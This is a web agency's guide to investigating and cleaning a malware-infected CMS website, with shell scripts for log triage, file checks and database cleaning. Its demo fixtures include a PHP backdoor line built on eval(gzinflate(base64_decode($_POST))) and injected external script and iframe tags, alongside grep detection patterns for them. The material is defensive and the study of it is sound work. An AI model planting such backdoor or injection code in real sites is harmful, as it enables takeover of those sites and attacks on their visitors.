What do I do?
Popular CMSs (content management systems) such as WordPress, Magento, Joomla and Drupal are more prone to malware than custom-developed web applications. This is mainly because their code is known to many developers across the world, including attackers, and a single vulnerability in a widely installed plugin can be exploited on thousands of sites at once. The rich open-source ecosystem around these CMSs lets developers contribute features and functionality in the form of modules, extensions and plugins, and some of those plugins have not been adequately tested for security vulnerabilities.
How did you find out that your website is hacked or has malware?
– You noticed your website is defaced or browsers show a warning message when opening it
– Your customers called to say their browser is displaying a malware alert
– You received a notification from your website hosting company
– You received a notification from Google Webmaster Tools (now Google Search Console)
If your WordPress, Joomla, Drupal or Magento website has been hacked for the first time and Google is showing a malware warning, we recommend contacting your website developer immediately.
An experienced web developer would start the investigation with the following steps:
– Analyse domain logs
Check your website's access log, FTP log and error log. The access log shows which pages were accessed, when, and which IP address was repeatedly making abnormal requests (for example many POSTs to the login page, or requests for a .php file inside the uploads directory). The error log shows which IP addresses are making unusual requests that throw errors, typically a scanner probing for admin tools and configuration files. It is also possible that your FTP account has been compromised; the FTP log tells you which IP address last logged in with your FTP credentials. If anything looks suspicious, block the offending IP address and change your FTP password immediately. On shared hosting you may have to ask the hosting company for these logs, and since FTP sends credentials in clear text, switch to SFTP if the host offers it.
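A scripted version of the access-log triage described above, added here as an example; it is not code from the original article. It defines a few shell functions over a constructed Apache/nginx combined-format log; the IP addresses, paths, login URLs and thresholds are placeholders for the demo.

```sh
#!/bin/sh
# Added example, not code from the original article. Triage an access log in
# the Apache/nginx "combined" format. The sample log below is constructed for
# the demo; the IP addresses, paths and thresholds are placeholders.
set -eu

# Constructed sample log. Field layout of the combined format (awk fields):
# $1 client IP, $4-$5 timestamp, $6 "METHOD, $7 path, $8 protocol", $9 status
write_sample_log() {
  cat > "$1" <<'EOF'
203.0.113.5 - - [10/May/2019:10:01:01 +1000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/May/2019:10:01:05 +1000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "python-requests/2.18"
198.51.100.7 - - [10/May/2019:10:01:06 +1000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "python-requests/2.18"
198.51.100.7 - - [10/May/2019:10:01:07 +1000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "python-requests/2.18"
198.51.100.7 - - [10/May/2019:10:01:09 +1000] "GET /wp-content/uploads/2019/05/x.php HTTP/1.1" 200 87 "-" "python-requests/2.18"
203.0.113.5 - - [10/May/2019:10:02:01 +1000] "GET /about/ HTTP/1.1" 200 4200 "-" "Mozilla/5.0"
192.0.2.44 - - [10/May/2019:10:03:01 +1000] "GET /xmlrpc.php HTTP/1.1" 404 210 "-" "curl/7.58"
192.0.2.44 - - [10/May/2019:10:03:02 +1000] "GET /phpmyadmin/ HTTP/1.1" 404 210 "-" "curl/7.58"
192.0.2.44 - - [10/May/2019:10:03:03 +1000] "GET /.env HTTP/1.1" 404 210 "-" "curl/7.58"
EOF
}

# Requests per client IP, busiest first ("count ip" per line).
requests_per_ip() {
  awk '{ print $1 }' "$1" | sort | uniq -c | sort -rn
}

# IPs that POSTed to a CMS login page at least $2 times: a brute-force lead.
# The login paths are the WordPress, Joomla and Magento defaults.
login_post_ips() {
  grep -E '"POST /(wp-login\.php|administrator/|index\.php/admin)' "$1" \
    | awk '{ print $1 }' | sort | uniq -c \
    | awk -v min="$2" '$1 >= min { print $2 }'
}

# Requests that executed a .php file from a directory that should only hold
# media: the classic sign of an uploaded backdoor being used. Prints "ip path".
php_in_uploads() {
  grep -E '"(GET|POST) /(wp-content/uploads|media|images)/[^" ]*\.php' "$1" \
    | awk '{ print $1, $7 }'
}

# IPs with at least $2 4xx responses: a scanner probing for admin tools and
# config files that are not there.
error_burst_ips() {
  awk '$9 ~ /^4[0-9][0-9]$/ { print $1 }' "$1" | sort | uniq -c \
    | awk -v min="$2" '$1 >= min { print $2 }'
}

# Demo run over the constructed log.
LOG=$(mktemp)
write_sample_log "$LOG"
echo "== requests per IP ==";              requests_per_ip "$LOG"
echo "== login brute-force candidates =="; login_post_ips "$LOG" 3
echo "== PHP executed from upload dirs =="; php_in_uploads "$LOG"
echo "== 4xx bursts ==";                   error_burst_ips "$LOG" 3
rm -f "$LOG"
```

Point the functions at the real access log instead of the constructed one (on cPanel-style hosting it usually lives under logs/ or access-logs/ in the home directory). An IP that shows up as a login brute-forcer and then fetches a .php file from the uploads directory tells you both which address to block and which file to look at first. FTP logs are a different format (for vsftpd, the xferlog), so read those separately.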
– Check file permissions
Whether it is WordPress, Drupal, Magento or Joomla, every CMS has its own file structure, and certain directories must be writable for the CMS to operate. Web developers are normally familiar with the CMS-specific structure and permissions. For example, Magento's "var" directory must be readable, writable and traversable (the execute bit on a directory) by the web server user; this is where Magento by default stores its cache, sessions and Magento-specific logs. Similarly, WordPress's "wp-content/uploads" must be writable by the web server user, as this is where users upload media content. In Magento and WordPress everything outside these directories can be locked down with stricter file and directory permissions. Nothing should be world-writable (mode 777), and because a writable upload directory is exactly where attackers drop PHP backdoors, check that no .php files exist there and configure the web server not to execute scripts from it.
– Check the CMS login for unusual users, pages and content
CMSs like WordPress, Magento, Joomla and Drupal provide an administration interface for managing content, plugins and pages. Check for any unusual pages or users. Remove any unwanted user accounts and the pages associated with them, and reset the passwords of the administrator accounts that remain, since the attacker may have them.
– Check for recently uploaded or modified files
If your hosting allows SSH (Secure Shell) access to the website, you can perform these tasks fairly easily from the shell.
To list files and directories with their details, sorted by modification time with the newest first:
$ ls -alt
The command below finds files under the current directory that were modified or uploaded in the last 24 hours and writes the list to investigate.txt to follow up on later:
$ find . -mtime -1 -print > investigate.txt
Attackers can reset a file's timestamp with touch, so an unremarkable modification time is not proof that a file is clean. The most reliable check is to compare the web root against a fresh copy of the same CMS and plugin versions and investigate every file that differs or does not exist in the original.
With an FTP (File Transfer Protocol) login you can perform the same tasks, but it takes a lot longer than with SSH access.
– Check for malware insertion in your scripts
The command below recursively searches all files under the current directory for a pattern. Injected code rarely contains a helpful word like "malware"; search instead for the constructs it usually relies on, such as eval(, base64_decode(, gzinflate( and hidden iframes, and read every hit, because legitimate plugins sometimes use the same functions:
$ grep -RE "eval\(|base64_decode\(|gzinflate\(|<iframe" .
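The file-system checks from the permission and modified-file steps above, as one added shell example; it is not code from the original article. It builds a small constructed web root in a temporary directory, lists files changed in the last 24 hours and world-writable files, flags PHP inside upload directories, and greps for the constructs injected scripts usually contain. The directory names, file contents and pattern list are constructed for the demo and are assumptions, not a complete set.

```sh
#!/bin/sh
# Added example, not code from the original article. Builds a constructed web
# root in a temp dir and runs the file-system checks from the permission and
# modified-file steps over it. File names, contents and patterns are
# constructed for the demo.
set -eu
umask 022   # so the demo tree gets 755/644 regardless of the caller's umask

# Constructs the demo site: normal files, one theme file with a line appended
# to it, one backdoor-shaped PHP file in uploads, one old world-writable file.
make_sample_site() {
  root="$1"
  mkdir -p "$root/wp-content/uploads/2019/05" "$root/wp-content/themes/site"
  printf '<?php\nrequire __DIR__ . "/wp-blog-header.php";\n' > "$root/index.php"
  printf '<?php\nfunction site_title() { return "Shop"; }\n' > "$root/wp-content/themes/site/helpers.php"
  printf '<?php\nfunction site_footer() { echo "(c) 2019"; }\n/* appended */ eval(base64_decode("aGVsbG8="));\n' > "$root/wp-content/themes/site/functions.php"
  printf '<?php @eval(gzinflate(base64_decode($_POST["x"])));\n' > "$root/wp-content/uploads/2019/05/x.php"
  printf 'old, untouched\n' > "$root/old-config.php"
  touch -t 201801010000 "$root/old-config.php"
  chmod 666 "$root/old-config.php"
}

# Files modified in the last 24 hours, the scripted form of "find . -mtime -1",
# skipping CMS cache/session dirs that churn constantly. Caveat: attackers can
# reset mtimes with touch, so a quiet tree is not proof of anything.
recently_modified() {
  find "$1" -type f -mtime -1 \
    ! -path '*/var/cache/*' ! -path '*/var/session/*' ! -path '*/wp-content/cache/*' \
    | sort
}

# Anything world-writable (mode o+w). Upload and cache dirs need to be
# writable by the web server user, never by everyone.
world_writable() {
  find "$1" \( -type f -o -type d \) -perm -002 | sort
}

# .php files under a directory that should hold only media.
php_in_upload_dirs() {
  find "$1" -type f -name '*.php' \
    \( -path '*/wp-content/uploads/*' -o -path '*/media/*' -o -path '*/images/*' \) | sort
}

# Constructs injected PHP/JS usually relies on. Legitimate code matches too
# (a plugin may really call base64_decode), so every hit is a lead to read.
SUSPICIOUS_PATTERNS='eval *\(|base64_decode *\(|gzinflate *\(|str_rot13 *\(|preg_replace *\(.*/e|<iframe[^>]*display: *none|<script[^>]*src=.https?://'

# file:line:match for every hit, recursively, scripts and markup only.
scan_for_injections() {
  grep -rEIn --include='*.php' --include='*.js' --include='*.html' \
    "$SUSPICIOUS_PATTERNS" "$1" || true
}

# Number of distinct files the scan flagged.
flagged_file_count() {
  scan_for_injections "$1" | cut -d: -f1 | sort -u | grep -c . || true
}

# Demo run.
SITE=$(mktemp -d)
make_sample_site "$SITE"
echo "== changed in the last 24h ==";   recently_modified "$SITE"
echo "== world-writable ==";            world_writable "$SITE"
echo "== PHP in upload directories =="; php_in_upload_dirs "$SITE"
echo "== suspicious code ==";           scan_for_injections "$SITE"
echo "flagged files: $(flagged_file_count "$SITE")"
rm -rf "$SITE"
```

Run the functions against the real web root instead of the constructed one. The untouched old-config.php in the demo is the case the mtime check misses and the permission check catches, which is why both are worth running; a diff against a pristine copy of the same CMS release (diff -rq live/ clean/) is the check that catches what neither does.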
The tasks above should reveal malware inserted into existing scripts or newly uploaded scripts.
If they find nothing, the malware is most likely in the database, and that is the next place to investigate.
– Investigate database
Start the database investigation by creating a SQL dump and a backup copy of it.
Create a SQL dump of your database with mysqldump (not mysql, which is the client) using the command below. Giving -p without the password makes it prompt for one, so the password does not end up in your shell history or in the process list where other users of a shared server can see it:
$ mysqldump -u username -p database_name > mydatabase.sql
Create a backup copy of the dump and do all your editing on the other file:
$ cp mydatabase.sql mydatabase_backup.sql
Once you have the backup, scan the dump for malware-related terms. Injected content in posts and options usually takes the form of a <script> tag loading from an external host, a hidden <iframe>, or encoded PHP such as eval(base64_decode(...)).
To scan the dump for such terms, with line numbers so you can locate the rows:
$ grep -nE "<script[^>]*src=\"https?://|<iframe|base64_decode" mydatabase.sql
If any such terms are found, you can remove the insertion manually with the search-and-replace feature of your editor. Databases these days are large, and removing entries by hand can be time consuming; the same task can be done with a single sed command over the dump file from SSH. Either way, work on the dump and keep the backup copy untouched.
To open the dump in the Unix vim/vi editor:
$ vim mydatabase.sql
Remove or replace the malware with vim's search and replace (:%s/pattern/replacement/g), save the file, check the result with the same grep as above, and re-import the cleaned dump into the database.
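The dump scan and clean-up described above, as an added shell example; it is not code from the original article. The dump is constructed, it uses WordPress's default table names only as an illustration, and the pattern list is an assumption about what injected markup typically looks like rather than a complete list.

```sh
#!/bin/sh
# Added example, not code from the original article. Scans a SQL dump for
# injected markup and writes a cleaned copy. The dump is constructed; the
# WordPress table names and the injection patterns are illustrative
# assumptions, not a complete list.
set -eu

# Constructed dump: clean rows, one option and one post with injected tags,
# and one post with a legitimate local <script> that must survive cleaning.
write_sample_dump() {
  cat > "$1" <<'EOF'
-- constructed dump for the demo
INSERT INTO `wp_options` VALUES (1,'siteurl','https://example.com','yes');
INSERT INTO `wp_options` VALUES (2,'blogname','Example Shop<script src="http://203.0.113.9/a.js"></script>','yes');
INSERT INTO `wp_posts` VALUES (10,'<p>Welcome to our shop.</p>');
INSERT INTO `wp_posts` VALUES (11,'<p>Contact us.</p><iframe src="http://203.0.113.9/f.html" style="display:none"></iframe>');
INSERT INTO `wp_posts` VALUES (12,'<p>Our <script src="/wp-includes/js/jquery.js"></script> page</p>');
EOF
}

# What injected content in posts/options usually looks like: a <script>
# pulled from an external host, or an <iframe> hidden with display:none.
INJECTION_PATTERN='<script[^>]*src="https?://[^"]*"></script>|<iframe[^>]*display: *none[^>]*></iframe>'

# line:row for every affected row in the dump.
find_injected_rows() {
  grep -nE "$INJECTION_PATTERN" "$1" || true
}

# Number of affected lines (prints 0 when the dump is clean).
count_injected_rows() {
  grep -cE "$INJECTION_PATTERN" "$1" || true
}

# Every external host a <script>/<iframe> in the dump points at. Compare
# with the hosts you expect (your CDN, analytics); anything unknown is the
# injection, and also the indicator to block at the firewall.
external_hosts() {
  grep -oE '<(script|iframe)[^>]*src="https?://[^/"]+' "$1" \
    | sed -E 's#.*src="https?://##' | sort -u
}

# Writes a cleaned copy with the injected tags deleted and every other byte
# untouched. Work on a copy; the original dump stays as the backup.
clean_dump() {
  sed -E \
    -e 's#<script[^>]*src="https?://[^"]*"></script>##g' \
    -e 's#<iframe[^>]*display: *none[^>]*></iframe>##g' \
    "$1" > "$2"
}

# Demo run.
DUMP=$(mktemp); CLEAN=$(mktemp)
write_sample_dump "$DUMP"
echo "== injected rows ==";  find_injected_rows "$DUMP"
echo "== external hosts =="; external_hosts "$DUMP"
clean_dump "$DUMP" "$CLEAN"
echo "rows still flagged after cleaning: $(count_injected_rows "$CLEAN")"
rm -f "$DUMP" "$CLEAN"
```

Diff the cleaned copy against the original before importing it (diff mydatabase.sql cleaned.sql), then load it with mysql -u username -p database_name < cleaned.sql. One caveat: rows that hold PHP-serialised data, which is common in wp_options, carry string length prefixes (s:NN:"..."), and deleting bytes inside them with sed corrupts the row; fix those through the CMS admin or a serialisation-aware search-and-replace tool instead.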
If you have followed these steps, by this stage you should have found where the malware sits, whether in the web directory, the scripts or the database, and be able to clean the website.
Once you have removed the malware and cleaned the website, advise your client to upgrade the CMS and the extensions and plugins in use.
Perform the following actions after cleaning the website:
– Upgrade the CMS and all plugins and extensions in use
– Set proper file and directory permissions
– Remove unwanted CMS users and unwanted pages and posts
– Remove any unused plugins, extensions and modules
– Change every password the attacker may have obtained: CMS admin accounts, database, FTP/SSH and the hosting control panel
– Implement a CMS-specific WAF (web application firewall)
– Change the default admin username and login URL to discourage brute-force attacks
Once you have tested and confirmed that the website is clean, explain the steps you took to clean it and request a review through your Google Webmaster Tools (now Google Search Console) login. If you do not have one, you can create one and then submit the review; the account also provides additional information about the website and is useful for the future. Alternatively, you can request a review from StopBadware.org; browsers such as Mozilla Firefox and Google Chrome share data with StopBadware.org.
I cleaned my website, but the malware came back after some time. What do I do now?
During the first malware attack you will have been in contact with your web developer and your hosting company. If you pay your hosting costs to your web developer or web design company, it is time to ask them the hard question: do they manage their own servers? Most web design companies resell hosting services, and the servers are in reality managed by another agency.
Identifying the root cause of the malware can take longer than usual, simply because your web developer has no root access to the server and no information about the server setup, firewall and installed software, while the hosting company merely provides the hosting platform and knows nothing about the scripts running on individual domains.
This lack of communication and information exchange between your web developer and your hosting company can be frustrating and time consuming.
At the end of the day you and your business suffer the most, and it is time to act fast.
Businesses today make significant investments in their websites and depend on them for new sales and lead generation. Repeated malware attacks hurt your company's reputation, damage search engine rankings and adversely affect online marketing initiatives.
First rule out anything left behind from the first incident: a backdoor file (typically a .php file in the uploads directory), a rogue CMS user, or credentials that were never changed. If the website itself is clean, the root cause may lie outside it.
Some of the reasons could be:
– Another website or script on the same server is vulnerable and is being used to infect your website
– The server itself is compromised and is attacking your website
– The server operating system and software are not patched, leaving your scripts exposed
– Unused ports are open and software is not configured properly
If that is the case, it is time to contact a digital agency that understands the development of your CMS website and, more importantly, manages its own servers. Premium digital agencies are more likely to handle their clients' website development and to manage their own servers as well. They have hands-on understanding of their server infrastructure and a development team with experience of your CMS platform. They will be able to quarantine your scripts, enable and read the database query log, access the server logs and monitor activity specific to your website. With this expertise and experience they can identify the root cause, fix it permanently and, most importantly, resolve the issue fast.
Netable has a team of developers and system administrators. We manage our own servers and have helped businesses whose websites were hacked or showed malware warnings.
Author: Suraj Rai
Suraj started as a web developer 15 years ago. He has over 10 years of experience as a Unix system administrator and is an AWS (Amazon Web Services) Certified Solutions Architect.
Please contact us on 03 9553 0449 or firstname.lastname@example.org if your website is showing a malware warning.